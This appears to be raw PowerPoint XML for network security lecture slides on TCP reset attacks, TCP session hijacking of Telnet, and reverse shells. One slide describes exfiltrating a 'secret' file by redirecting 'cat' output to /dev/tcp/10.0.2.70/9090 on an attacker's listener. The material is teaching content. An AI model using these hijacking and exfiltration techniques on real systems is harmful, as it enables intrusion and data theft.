              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Two transport Layer protocols</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="860425" lvl="2" indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> provides a reliable and ordered communication channel between applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="860425" lvl="4" indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UDP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lightweight protocol with lower overhead and can be used for applications that do not require reliability or communication order.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TCP Reset Attack on Telnet Connection</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73" y="1912416"/>
            <a:ext cx="6418484" cy="19730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DF0E-4A1E-7216-C534-3023A803771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Auto TCP Rest Attack: Sample Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Content Placeholder 8" descr="Text, letter&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE65A228-436C-0B17-86A3-5511950B54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90629"/>
            <a:ext cx="6551733" cy="3386610"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2680971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Reset Attack on SSH connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Shape 250"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497434" y="2829800"/>
            <a:ext cx="8377766" cy="1812000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the encryption is done at the network layer, the entire TCP packet including the header is encrypted, which makes sniffing or spoofing impossible. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But as SSH conducts encryption at Transport layer, the TCP header remains unencrypted. Hence the attack is successful as only header is required for RST packet.</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533" y="1250913"/>
            <a:ext cx="7688426" cy="134569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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To reset a connection between two remote machines, i.e., we will not be able to see the packets between these two machines, what are the main challenges?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95160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Session Hijacking Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Shape 274"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562342" y="2873667"/>
            <a:ext cx="7794258" cy="1732200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To inject data in an established connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spoofed TCP Packet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The following fields need to be set correctly:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source IP address, Source Port, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Destination IP address, Destination Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="576263" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sequence number (within the receiver’s window)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="-69850">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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03" y="1195061"/>
            <a:ext cx="6980525" cy="15012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TCP Session Hijacking Attack: Sequence Number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Shape 282"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152476"/>
            <a:ext cx="8520600" cy="2056392"/>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If the receiver has already received some data up to the sequence number x, the next sequence number is x+1. If the spoofed packet uses sequence number as x+𝛿, it becomes out of order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The data in this packet will be stored in the receiver’s buffer at position x+𝛿, leaving 𝛿 spaces (having no effect). If 𝛿 is large, it may fall out of the boundary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Shape 276"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1545897" y="3208868"/>
            <a:ext cx="6400183" cy="148166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Hijacking a Telnet Connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Shape 288"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431447" y="3252146"/>
            <a:ext cx="7522880" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="-69850" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User establishes a telnet connection with the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on attacker machine to sniff the traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Retrieve the destination port (23), source port number (46712) and sequence number.</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47" y="1247255"/>
            <a:ext cx="7403133" cy="19954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What Command Do We Want to Run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Shape 295"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="20628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By hijacking a Telnet connection, we can run an arbitrary command on the server, but what command do we want to run?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider there is a top-secret file in the user’s account on Server called “secret”. If the attacker uses “cat” command, the results will be displayed on server’s machine, not on the attacker’s machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In order to get the secret, we run a  TCP server program so that we can send the secret from the server machine to attacker’s machine.</a:t>
            </a:r>
            <a:endParaRPr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3" y="3539771"/>
            <a:ext cx="7169397" cy="132602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Session Hijacking: Steal a Secret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Shape 302"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259600" y="1152475"/>
            <a:ext cx="8520600" cy="2302500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“cat” command prints out the content of the secret file, but instead of printing it out locally, it redirects the output to a file called /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/10.0.2.70/9090 (virtual file in /dev folder which contains device files). This invokes a pseudo device which creates a connection with the TCP server listening on port 9090 of 10.0.2.70 and sends data via the connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The listening server on the attacker machine will get the content of the file.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09" y="3454975"/>
            <a:ext cx="6439799" cy="485843"/>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09" y="3940818"/>
            <a:ext cx="6439799" cy="6350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Launch the TCP Session Hijacking Attack</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68" y="1657076"/>
            <a:ext cx="8154538" cy="28388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Data Transmission</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="Shape 113"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1129625"/>
            <a:ext cx="5269150" cy="2884250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5580850" y="1129625"/>
            <a:ext cx="3497100" cy="3292558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Once a connection is established, OS allocates two buffers at each end, one for sending data (send buffer) and receiving buffer ( receive buffer).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>When an application needs to send data out, it places data into the TCP send buffer.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47DC-2FE6-10C5-76F0-345D3196CEC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Session Hijacking: Automatic Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Content Placeholder 12" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE48CF9C-2486-E47A-1180-D007BDB991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200150"/>
            <a:ext cx="6273088" cy="3365176"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1110265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Creating Reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Shape 34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Bef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The best command to run after having hijacked the connection is to run a reverse shell command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To run shell program such as /bin/bash on Server and use input/output devices that can be controlled by the attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The shell program uses one end of the TCP connection for its input/output and the other end of the connection is controlled by the attacker machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse shell is a shell process running on a remote machine connecting back to the attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is a very common technique used in hacking.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73A1-029E-F605-D584-31EB80FC31F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Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Timeline&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E2E3AB-2265-CF87-4EAC-43CB4C94D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373818"/>
            <a:ext cx="7372350" cy="2395864"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2366682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File Descriptors and Standard I/O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{848D60DB-D3CA-4F3C-8FCD-2C9B828823CA}"/>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0 – STDIN, keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1 – STDOUT, monitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2 – STDERR, monitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0, 1, 2 are called file descriptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{143B1014-6BF6-4F04-958F-FC3550AC6F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755692" y="3000971"/>
            <a:ext cx="4889416" cy="1938696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1719537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DF08-7415-4870-B2C8-A22EB8EECD1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I/O Redirect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D66646CD-5A5E-49A3-AA29-8C9992F13F4B}"/>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&lt; input redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
